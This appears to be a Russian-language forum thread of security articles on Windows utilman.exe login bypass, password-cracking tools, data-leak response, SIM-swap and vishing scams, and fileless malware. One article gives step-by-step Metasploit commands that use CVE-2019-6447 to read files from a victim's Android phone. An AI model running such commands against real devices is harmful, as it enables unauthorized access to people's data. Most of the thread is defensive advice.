                    Ниже представлено пошаговое руководство того, как осуществляется этот эксплойт:
                    • Доступ к экрану входа в систему. Злоумышленнику необходим физический или удаленный доступ к экрану входа в систему целевого компьютера.
                    • Запуск эксплойта. На экране входа в систему злоумышленник нажимает кнопку «Специальных возможностей», которая располагается в правом нижнем углу.
                    • Замена Utilman.exe. Далее хакер заменяет приложение диспетчера утилит (utilman.exe) на cmd.exe (командная строка), переименовывая файлы. Это можно сделать с помощью внешнего загрузочного носителя или другими способами, если злоумышленник уже имеет доступ к системе.

                    • Выполнение команд. После нажатия кнопки вместо запуска инструментов специальных возможностей запускается командная строка с правами администратора.
                    • Манипулирование системой. Из командной строки злоумышленник может использовать команды для создания новых учетных записей пользователей, изменения паролей или получения доступа к конфиденциальным файлам и настройкам.

                    Защита от взлома Windows

                    1. Используйте надежные пароли. Создавайте сложные пароли, состоящие из прописных и строчных букв, цифр и специальных символов. Избегайте использования личной информации в пароле, такой как даты рождения или клички животного.
                    2. Включите двухфакторную аутентификацию (2FA). Двухфакторная аутентификация добавляет дополнительный уровень безопасности, требуя второго этапа проверки, часто через мобильное приложение или электронную почту, помимо вашего пароля.
                    3. Регулярные обновления. Обновляйте свою операционную систему и все программные обеспечения. Обновления часто включают исправления уязвимостей, что снижает риск взлома.
                    4. Остерегайтесь фишинга. Будьте осторожны, нажимая на подозрительные ссылки или предоставляя данные для входа на незнакомых веб-сайтах. Хакеры часто используют тактику фишинга для кражи учетных данных.
                    5. Антивирус от вредоносных программ. Установите надежное антивирусное программное обеспечение, чтобы обнаружить и предотвратить заражение вашей системы вредоносным ПО.
                    6. Брандмауэр. Используйте брандмауэр для мониторинга и контроля входящего и исходящего сетевого трафика, что может помочь предотвратить стороннее проникновение.

                    Комментарий


                    • Лучшие инструменты для взлома всех времен

                      Лучшие инструменты для взлома всех времен

                      С ростом киберпреступности появляются все новые инструменты для взлома. В игру вступают новые механизмы защиты или нападения, которые не всегда являются лучшей заменой старым и проверенным инструментам. Поэтому оставаться в курсе лучших инструментов кибербезопасности – непростая задача. Тем не менее, мы составили для вас подборку Топ-10 инструментов для взлома всех времен.


                      Дисклеймер: Данная статья представлена исключительно в образовательных целях для информирования читателей о взломах. Мы не несём ответственности за любые ваши действия.
                      Brutus

                      В октябре 2000 года был выпущен Brutus, один из наиболее широко используемых онлайн-инструментов для взлома паролей. Разработчик утверждает, что Brutus является самым быстрым и гибким инструментом для взлома паролей из всех доступных на рынке.
                      Brutus — бесплатный инструмент, доступный только для клиентов Windows. Он поддерживает ряд аутентификаций, таких как HTTP, Telnet, Pop3, IMAP и т. д. Кроме того, он содержит дополнительные функции, позволяющие пользователям создавать свой собственный тип аутентификации. Несмотря на то, что Brutus давно не обновлялся, он до сих пор остается одним из самых полезных инструментов для взлома паролей.
                      RainbowCrack

                      RainbowCrack — это инструмент, который взламывает хэши с использованием радужных таблиц. RainbowCrack поражает своей скоростью, поскольку он взламывает пароли быстрее, чем традиционные инструменты брутфорса.
                      Разработчики RainbowCrack также успешно создали радужные таблицы MD5, Sha1, NTLM и радужные таблицы LM, которые можно скачать бесплатно и использовать в процессе взлома паролей. Инструмент работает на платформах Windows и Linux и поддерживает вычисления на многоядерных процессорах.
                      Wfuzz

                      Wfuzz — это инструмент для взлома паролей, который использует методы грубой силы. Также его можно использовать для обнаружения скрытых ресурсов (каталоги, сценарии и сервлеты). Wfuzz способен обнаруживать различные внедрения, такие как LDAP, SQL и т. д., внутри целевого приложения с возможностью создания инъекций из нескольких точек одновременно. Это бесплатное программное обеспечение, доступное для Windows, macOS и Linux.
                      Cain & Abel

                      Cain & Abel — популярный инструмент для взлома паролей, который использует слабые места в системе безопасности. Он работает с сетевыми анализаторами для взлома зашифрованных паролей с помощью атаки по словарю. Cain & Abel будет полезен не только для хакеров, но и для специалистов по сетевой безопасности и тестировщиков.
                      John the Ripper

                      John the Ripper — очень известный инструмент для взлома паролей с открытым исходным кодом, доступный для всех платформ, таких как Linux, macOS, Unix, Windows и т. д. Джон потрошитель может легко взломать пароли. Помимо этого, он имеет настраиваемый взломщик с возможностью автоматического определения типов хэшей паролей. У Джона Потрошителя также есть профессиональная версия, которая включает в себя расширенные функции для более быстрого и точного взлома паролей.
                      THC-Hydra

                      THC-Hydra — это инструмент для быстрого взлома паролей, который поддерживает множество сервисов. Это один из лучших инструментов для удаленного взлома с помощью перебора, поскольку он использует эффективные атаки по словарю против более чем 30 протоколов, включая FTP, HTTPS, Telnet, SMB и многие другие. Hydra доступен для ряда платформ, включая Solaris, Windows, Linux и т. д..
                      Medusa

                      Medusa — еще один популярный инструмент для взлома паролей на основе командной строки. Он поддерживает MS SQL, MYSQL, HTTP, FTP, CVS, SMTP, SNMP, SSH и многие другие протоколы. У Medusa есть отличная возможность выполнять параллельные атаки одновременно на разные системы, это означает, что вы можете взломать несколько приложений одновременно, просто предоставив подробную информацию о целях. Medusa — один из лучших инструментов для взлома паролей всех времен.
                      OPHCrack

                      OPHCrack — это инструмент с открытым исходным кодом на основе радужных таблиц для взлома паролей, который является самым популярным средством взлома паролей для устройств под управлением Windows. Он может легко взломать хэши NTLM и LM, а также предоставляет графики в реальном времени для анализа паролей. Одна из его удивительных возможностей заключается в том, что он может импортировать хеши из различных форматов, включая дамп непосредственно из SAM-файлов Windows. OPHCrack также предоставляет на своей платформе Live CD и бесплатные радужные таблицы, чтобы еще больше упростить процесс взлома паролей.
                      L0phtCrack

                      L0phtCrack взламывает пароли Windows, ориентируясь на хэши, что делает его лучшей заменой OPHCrack. Он использует основные контроллеры домена, рабочие станции (Windows), сетевые серверы, а также атаку методом перебора и атаки по словарю для получения паролей.
                      Aircrack-NG

                      Aircrack-NG — лучший инструмент для взлома паролей сетей WEP и WPA. Это инструмент командной строки, который может работать на всех платформах, таких как Windows, Linux и т.д.. Механизм атаки, используемый этим инструментом, довольно прост. Все, что он делает, это отслеживает и собирает пакеты, и как только будет перехвачено достаточное количество пакетов, он пытается восстановить пароль, что делает атаку намного быстрее по сравнению с другими инструментами взлома WEP.
                      Заключение

                      Вышеупомянутые инструменты являются лучшими, когда дело доходит до взлома паролей. Но также они указывают на очень важный аспект: любой пароль в этом мире можно взломать, если у злоумышленника есть соответствующие инструменты для выполнения задачи. Итак, все, что мы можем сделать, это убедиться, что наши пароли являются достаточно надежными, чтобы противостоять любым возможным атакам с помощью этих инструментов.

                      Комментарий


                      • Утечка данных: что делать, если персональные данные попали в Сеть




                        Вступить в наш чат
                        Представьте этот тревожный момент, когда вы узнаете, что ваши данные утекли в сеть. Наверняка, первое, что вы почувствуете — это шок, растерянность и приступ гнева. И это вполне объяснимо, ведь ваши персональные данные под угрозой. Сердце бешено колотится, а разум затуманен тысячей вопросов. Какие данные были скомпрометированы? Как это произошло? Остановитесь. Первый шаг к устранению проблемы — это сделать глубокий вдох. Паника не поможет.



                        Шаг 1. Проверка подлинности

                        Получение электронного письма от компании, где произошла утечка может вызвать панику, но есть действия, которые вы можете быстро предпринять, чтобы защитить свой аккаунт и ограничить ущерб. Первое, что необходимо сделать — это проверить подлинность письма. Киберпреступники часто создают убедительные фишинговые электронные письма, чтобы украсть еще больше вашей информации. Поддельные имейлы являются распространенным трюком, которые злоумышленники используют, чтобы выдавать себя за доверенных лиц.
                        Ни в коем случае не нажимайте ни на какие ссылки и не загружайте вложения из письма. Вместо этого зайдите прямо на официальный сайт компании, если утечка данных, действительно, произошла, то информация об этом должна быть там.
                        Шаг 2. Оценка ущерба

                        После подтверждения утечки пришло время оценить ущерб. Прочитайте внимательно, чтобы понять, что случилось. Какие ваши персональные данные входят в утечку. Ваши следующие шаги будут зависеть от этой информации.
                        Шаг 3. Измените пароли

                        Основная проблема большинства пользователей интернета — это одинаковые пароли в нескольких сервисах, что позволяет злоумышленникам при первой удобной возможности заполучить доступ к вашим аккаунтам. Итак, вам необходимо придумать новый, уникальный пароль (который больше нигде не используется) для утекшей учетной записи. Если вы не можете войти, свяжитесь с сайтом, чтобы спросить, как восстановить или удалить аккаунт. Видите аккаунт, который не узнаёте? Сайт, возможно, изменил имена или кто-то мог создать аккаунт с помощью вашего адреса электронной почты.
                        Шаг 4. Включите двухфакторную аутентификацию

                        Для усиленной безопасности включите двухфакторную аутентификацию (2FA) везде, где это возможно. Этот дополнительный уровень защиты может значительно усложнить жизнь хакера. Обратите особое внимание на аккаунты электронной почты, облачных сервисов, социальных сетей, мессенджеров и сервисов типа iCloud, которые привязаны к вашим персональным устройствам. Начните использовать двухфакторную аутентификацию во всех сервисах, которыми вы пользуетесь, если такая опция доступна.
                        Шаг 5. Мониторинг финансовых аккаунтов

                        Следите за выписками из вашего банка и кредитной карты на предмет любых подозрительных действий. Немедленно сообщайте о любых несанкционированных транзакциях в свой банк. Убедитесь, что на ваше имя не было открыто никаких новых счетов, займов или кредитных карт. Иногда утечки могут привести к подозрительной деятельности или краже личных данных.
                        Шаг 6. Внимание «фишинг»

                        Будьте осторожны с любыми нежелательными электронными письмами или текстовыми сообщениями, в которых запрашивается личная информация или данные для входа. Не переходите ни по каким ссылкам в этих сообщениях.
                        Шаг 7. Следите за обновлениями

                        Если нарушение произошло на предприятии или в организации, свяжитесь с поддержкой и узнайте, что они делают для исправления ситуации. Кроме того, следите за обновлениями и объявлениями от компании, в которой произошла утечка данных, поскольку они могут предоставить важную информацию о том, как защитить себя.
                        Шаг 8. Проведите аудит безопасности

                        В целом подобное событие является очень хорошим стимулом для проведения «дня безопасности» и повышения уровня защищенности ваших аккаунтов. Выполните аудит безопасности ваших аккаунтов при помощи сервисов типа Have I been pwned и SpyCloud. Они отслеживают актуальные утечки и могут помочь вам понять, какие аккаунты могли быть скомпрометированы. Удалите старые учетные записи, которыми больше не пользуетесь и обновите настройки конфиденциальности других.
                        Заключение

                        Получение уведомления об утечке данных может оказаться ужасающим событием, но помните: вы не одиноки. В конце концов, никто из нас не может существенно повлиять на утечки данных. Чем дольше вы находитесь в Сети, тем больше становится ваш цифровой след, а вместе с ним и больше риски для безопасности. Тем не менее, следуя вышеперечисленным шагам, вам удастся преодолеть «бурные потоки» утечки данных и выйти из воды практически сухим. Знание – сила. Продолжайте следить за нашими статьями по информационной безопасности, чтобы всегда будьте начеку.

                        Комментарий


                        • Как взломать Android с помощью ES File Explorer




                          Вступить в наш чат
                          ES File Explorer — файловый менеджер для устройств Android с широким набором функций. Такие менеджеры нужны, чтобы помогать пользователям управлять файлами на устройстве, а именно — изображениями, музыкой, видео, документами и приложениями. ES Проводник прекрасно работает с root-правами, а про версия без рекламы в буквальном смысле слова является вишенкой на торте. Однако с этим функционалом приходит и повышенный риск взлома злоумышленниками – с чем и столкнулись недавно пользователи приложения. Итак, сегодня мы расскажем, как именно хакерам удается взламывать устройства Android.

                          Дисклеймер: Данная статья представлена исключительно в образовательных целях для информирования читателей о взломах. Мы не несём ответственности за любые ваши действия.
                          Как работает эксплойт ES explorer

                          Уязвимость имеет идентификатор CVE-2019-6447. Это уязвимость, при которой проводник открывает HTTP-сервер при каждом запуске приложения. Этот модуль подключается к HTTP-серверу ES File Explorer для запуска нижеуказанных команд, которые помогают получить доступ к устройству Android. HTTP-сервер запускается каждый раз вместе с приложением и, таким образом, является серьезной уязвимостью. Стоит отметить, что уязвимость была исправлена вместе с новыми обновлениями, поэтому взлом будет работать только на старых версиях приложения.
                          Как взломать Android с помощью уязвимости ES File Explorer

                          Шаг 1. Откройте терминал Kali Linux.
                          Шаг 2. Откройте Metasploit с помощью следующей команды:
                          msfconsole



                          Шаг 3: Теперь, чтобы начать взламывать Android введите:
                          use auxiliary/scanner/http/es_file_explorer_open_port



                          Шаг 4. Если вы хотите прочитать дополнительную информацию об эксплойте, используйте команду:
                          info



                          Шаг 5: Чтобы этот хак сработал, вам нужно узнать IP-адрес жертвы. Вы можете использовать Nmap/Zenmap в Kali Linux, чтобы найти целевой IP-адрес. Также вы можете выбрать Zanti, если используете termux и Android.
                          Введите, чтобы увидеть параметры, которые вы можете установить:
                          show options

                          set RHOSTS 192.168.1.20



                          Как только цель выбрана, вам нужно запустить следующую команду, чтобы просмотреть все доступные параметры:
                          show actions

                          set action GETDEVICEINFO



                          Когда действие будет установлено, просто введите run, как показано ниже.




                          Вы получите имя устройства:
                          Предположим, что мы хотим просмотреть все аудиофайлы на устройстве:
                          set action LISTAUDIOS


                          run



                          Итак, вы только что получили доступ к аудиофайлам жертвы. Остальные команды вы можете использовать аналогичным образом. На этом все. Удачи!

                          Комментарий


                          • Скам с заменой SIM-карты: что это такое и как защитить себя

                            Скам с заменой SIM-карты: что это такое и как защитить себя

                            Все привыкли думать, что злоумышленники могут украсть деньги с банковской карты, только если сообщить им код с обратной стороны карточки. И действительно, большая часть мошенничеств совершается именно так. Однако сейчас существуют и более изощренные способы, для которых секретные данные не нужны. В этой статье мы прольем свет на **** с заменой симки, а главное поделимся советами, которые помогут обезопасить себя.


                            Что такое **** с заменой SIM-карты

                            Скам с заменой SIM-карты предполагает тщательно организованный акт мошенничества, в котором киберпреступники берут под контроль ваш номер телефона, чтобы получить доступ к вашим звонкам, текстовым сообщениям и, что самое страшное, к вашим кодам двухфакторной аутентификации (2FA).
                            Чтобы понять, как разворачивается мошенничество с заменой SIM-карты, важно разобрать его поэтапно:
                            • Сбор информации. Киберпреступники начинают свою атаку с тщательного сбора вашей личной информации. Эта сокровищница часто включает в себя данные, полученные из ваших профилей в социальных сетях, утечек данных или попыток фишинга. Вооружившись знаниями о вашем ФИО, дате рождения, номере телефона, они переходят к следующему этапу.
                            • Общение с оператором мобильной связи. Имея ваши данные, мошенники хитро выдают себя за вас. Они инициируют контакт с вашим оператором мобильной связи, утверждая, что потеряли свой телефон или SIM-карту. В некоторых случаях они могут даже выдать себя за представителя службы поддержки вашего банка для большей правдоподобности.
                            • Замена SIM-карты. Если обман увенчается успехом, оператор связи быстро активирует новую SIM-карту с вашим номером телефона, а затем деактивирует существующую. Этот поворотный момент наступает, когда вы теряете доступ к своему телефону, а злоумышленники захватывают контроль над вашей цифровой личностью.
                            • Захват учетной записи. Получив контроль над вашим номером телефона, злоумышленники могут сбросить вашу электронную почту и банковские пароли. Из наиболее частых последствий следует ожидать несанкционированные финансовые операции и кражу личных данных.

                            Защита вашей цифровой личности

                            Теперь, когда мы раскрыли зловещие механизмы мошенничества с заменой SIM-карт, пришло время вооружиться знаниями и средствами защиты, необходимыми для предотвращения этих нежелательных атак.
                            1. Выключение 2FA на основе SMS: хотя двухфакторная аутентификация на основе SMS удобна, она не надежна. Рассмотрите возможность перехода на более безопасные методы аутентификации, такие как биометрия.
                            2. Мониторинг учетных записей: регулярно проверяйте свои финансовые учетные записи на предмет необычной активности. Раннее обнаружение может предотвратить негативные последствия скама с заменой SIM-карты.
                            3. Будьте осторожны в Интернете: ограничьте личную информацию, которой вы делитесь в социальных сетях. Киберпреступники часто используют ее, чтобы выдать себя за вас.
                            4. Установите код-пароль. Свяжитесь со своим оператором мобильной связи и установите уникальный персональный идентификационный номер (PIN-код) или код-пароль для своей учетной записи. Требуйте этот код в качестве обязательного этапа проверки, прежде чем можно будет внести какие-либо изменения.
                            5. Используйте код восстановления электронной почты. Вместо того, чтобы полагаться на SMS для сброса пароля, установите код восстановления электронной почты. Это обеспечивает дополнительный уровень безопасности.

                            Цифровая безопасность в ваших руках

                            Пока мы плывем по коварные водам нашей цифровой эпохи, крайне важно оставаться на шаг впереди киберпреступников, которые неустанно разрабатывают новые тактики. Более того, мошенничество с заменой SIM-карт — лишь одно из проявлений продолжающейся борьбы за безопасность и конфиденциальность. Приняв контрмеры, изложенные в этой статье, вы можете значительно снизить возможность стать жертвой мошенничества. Помните, что знания — ваше самое мощное оружие в продолжающейся борьбе с киберугрозами. Будьте в курсе, сохраняйте бдительность и поделитесь этой статьей с другими, чтобы создать более безопасную цифровую среду для всех нас.

                            Комментарий


                            • Бесфайловое вредоносное ПО: защита от невидимых угроз

                              Бесфайловое вредоносное ПО: защита от невидимых угроз




                              С каждым годом киберпреступники совершенствуют свои способы атак, стараясь делать вирусы менее заметными. И такие угрозы уже существуют в виде "бесфайловых" вирусов. И беспокоиться есть о чём, поскольку вредоносное программное обеспечение способно месяцами "сидеть" в ваших компьютерах, не давая о себе знать, а после чего нанести колоссальный ущерб. Что же представляет из себя этот вирус и как от него можно защититься?



                              Что такое бесфайловое вредоносное ПО


                              Обычно вредоносные программы внедряют в компьютер несколько файлов, которые содержат саму повреждающую компьютер программу, которая копирует какие-то важные для вас данные и перемещает их во внешнее хранилище. Антивирусы умеют успешно бороться с такими программами по их остаточным следам, это своеобразный почерк программы. Но "бесфайловые" вирусы умеют скрывать свои следы, маскируясь под обычные действия операционной системы. Такой вирус представляет из себя вредоносный код, который разработан таким образом, чтобы не записывать себя на жёсткий диск, а работать полностью из оперативной памяти.
                              Как же "бесфайловый" вирус попадает в систему? Наиболее вероятны два варианта:
                              • через устаревшие браузеры и плагины (дополнения к возможностям программы);
                              • через заражённые веб-страницы или электронные письма в формате .doc или .txt.

                              Как вернуть контроль над ПК

                              В этой ситуации главное действовать быстро, чтобы защитить конфиденциальную информацию. Вот шаги, которые вы можете предпринять, чтобы вернуть контроль над этим невидимым противником:
                              1. Изоляция. Первым и наиболее важным шагом будет изолировать свое устройство от сети. Отключение интернета помешает злоумышленнику связаться со своими серверами управления и контроля.
                              2. Сканирование и очистка. Для обнаружения и удаления безфайлового вредоносного ПО понадобятся специализированные инструменты. Традиционное антивирусное программное обеспечение не справится с этой задачей, поскольку оно не сможет обнаружить эти скрытые угрозы.
                              3. Исправление и обновление. Нужно немедленно исправить уязвимое программное обеспечение, которое было использовано. А для предотвращения подобных атак важно всегда регулярно обновлять ПО.
                              4. Изменение паролей. Везде, где только можно постарайтесь изменить свои пароли, чтобы злоумышленник не мог заполучить доступ к вашим учетным записям.

                              Как предотвратить заражение бесфайловым ПО

                              Избежать заражения можно простыми правилами информационной безопасности:
                              • своевременное обновление браузера и антивируса. Эта мера сокращает риск попадания вирусов на 85%.
                              • соблюдение предупреждений антивируса о посещаемых страницах. Антивирус никогда не запрещает доступ к безопасной странице. Если предупреждение появилось, то скорее всего на странице размещён зловредный программный код, который запустится автоматически, или сайт уже ранее использовался для совершения атак.
                              • своевременное обновление операционной системы . Компания Microsoft выпускает регулярные патчи (файлы, исправляющие в программах ошибки, либо устанавливающие дополнения) для Windows, также происходит и у разработчиков других операционных систем. Важно понимать, что старая версия ОС более уязвима для злоумышленников и вероятность "подцепить" вирус выше.
                              • удаление электронных писем с вложениями от неизвестных отправителей.
                              • ограничение доступа третьих лиц к вашему компьютеру. Если предоставляете доступ, то убедитесь, что понимаете какие это права.

                              Заключение

                              Борьба с киберугрозами продолжается и постоянно меняется. Появляются невидимые вирусы, которые могут нанести удар, когда вы меньше всего этого ждете. Именно поэтому, мы должны оставаться на шаг впереди тех, кто стремится нарушить нашу конфиденциальность. Итак, в следующий раз, когда вы будете нажимать на безобидную ссылку, помните, что невидимая угроза бесфайлового вредоносного ПО реальна. Будьте готовы, ваш путь в области безопасности начинается со знаний о киберугрозах. Надеемся, что эта статья оказалась информативной и поучительной для вас. Удачи!

                              Комментарий


                              • Вишинг: Что это такое и как защититься

                                Вишинг: Что это такое и как защититься

                                По мере развития технологий совершенствуется и тактика киберпреступников, стремящихся завладеть личной и финансовой информацией пользователей. Одним из таких способов мошенничества, получивший известность в последние годы, является вишинг. В этой статье мы подробно изучим мир вишинга, поймем, как он работает, и вооружимся знаниями, которые помогут предотвратить такое мошенничество и защитить вашу личную информацию.



                                Открывая мир вишинга

                                Вишинг (англ. Vishing, сокращение от “voice phishing,”), что в переводе означает «голосовой фишинг», — это тип атаки с использованием социальной инженерии, при которой злоумышленники выдают себя за доверенные организации или отдельных лиц посредством телефонных звонков или сообщений голосовой почты. Конечная цель — получить личную, финансовую и конфиденциальную информацию от своих жертв.
                                Мошенники каждый раз действуют по определенной схеме: рассылают сообщения с вредоносными ссылками, после перехода по которым, отображается синий экран с предупреждающим сообщением и бесплатным номером телефона, по которому следует позвонить для устранения возникшей проблемы с компьютером.
                                По указанному номеру телефона отвечает технический специалист, готовый оказать любую помощь пользователю, после того как последний предоставит «специалисту» информацию о своей кредитной карте для оплаты программного обеспечения. После передачи потерпевшим данной информации, мошеннические действия завершаются, программное обеспечение не работает, технический специалист не отвечает, а денежные средства с банковской карты пропадают.
                                Распознать потенциальное мошенничество можно по определенным предупреждающим знакам:
                                • Доверенные лица. Зачастую мошенники представляются экспертами или специалистами в каких-либо областях. При этом, они могут называться компьютерными специалистами, банкирами, полицейскими и т.д. Целью этого подражания является создание у жертв ложного чувства безопасности.
                                • Срочность и страх. Мошенники манипулируют жертвами, вызывая у них чувство неотложности или страха. Например, они могут заявить, что ваш банковский счет заблокирован и необходимо немедленно снять блокировку. Эта срочность вынуждает людей поспешно раскрывать конфиденциальную информацию.

                                Инструменты для поиска жертвы

                                В схемах вишинга злоумышленники используют генераторы мобильных номеров и скрипты для проверки их валидности (чекеры). Как понятно из названия, генератор создает подборку номеров, а чекеры проверяют, активны ли они.





                                На этих скриншотах вы можете увидеть, как происходит проверка сгенерированных ранее мобильных номеров. Кроме, их валидации, указывается регион и провайдер связи. В итоге злоумышленник получает список номеров для распространения мошеннических сообщений. Такие же инструменты используются, например, для сбора контактов из мессенджеров.
                                Некоторые инструменты открыто можно найти в легальных магазинах приложений, по типу Chrome Store и Google Play.


                                Существует множество магазинов, где мошенник может купить базы данных потенциальных жертв (обычно это email или мобильные номера, а также может быть фамилия и имя человека, регион проживания). Данные магазины могут использоваться для покупки, например, базы мобильных номеров для спама и телефонного мошенничества. Также там можно приобрести аккаунты соцсетей и мессенджеров для последующего совершения мошеннической атаки.


                                Как защититься от вишинга

                                1. Проверьте личность вызывающего абонента
                                Никогда не доверяйте слепо информации абонента, даже если она, как вам кажется, получена из надежного источника. Если во время телефонного звонка вам поступил запрос о вашей личной информации, немедленно повесьте трубку. Затем самостоятельно проверьте личность звонящего по официальным каналам.
                                2. Берегите свою личную информацию
                                Ни при каких обстоятельствах вы не должны сообщать личную или финансовую информацию по телефону, особенно если звонок был инициирован не вами. Законные организации никогда не будут запрашивать по телефону конфиденциальные данные, такие как номера социального страхования, пароли учетных записей или данные кредитной карты.
                                3. Не идите на поводу у манипулятора
                                Вишинг-мошенники полагаются на тактику эмоционального давления, чтобы подтолкнуть вас к принятию импульсивных решений. Всегда оставайтесь при совсем мнении. Прервите разговор, дайте себе время на обдумывание услышанного.
                                4. Используйте защиту от спам-звонков
                                Все современные мобильные телефоны оснащены функцией проверки вызовов, которая может помочь выявить и заблокировать все нежелательные звонки.
                                Заключение

                                Вишинг представляет собой серьезную угрозу в наш цифровой век. Однако, понимая механику телефонного мошенничества, и следуя подробным советам, представленным в этой статье, вы сможете значительно обезопасить себя. Помните, что ваша личная информация бесценна, и ее защита имеет первостепенное значение. Следите за нашими статьями, чтобы оставаться в курсе, так как осведомленность и осторожность помогут вам оставаться на шаг впереди мошенников и не стать их жертвой.

                                Комментарий

                                Обработка...
                                X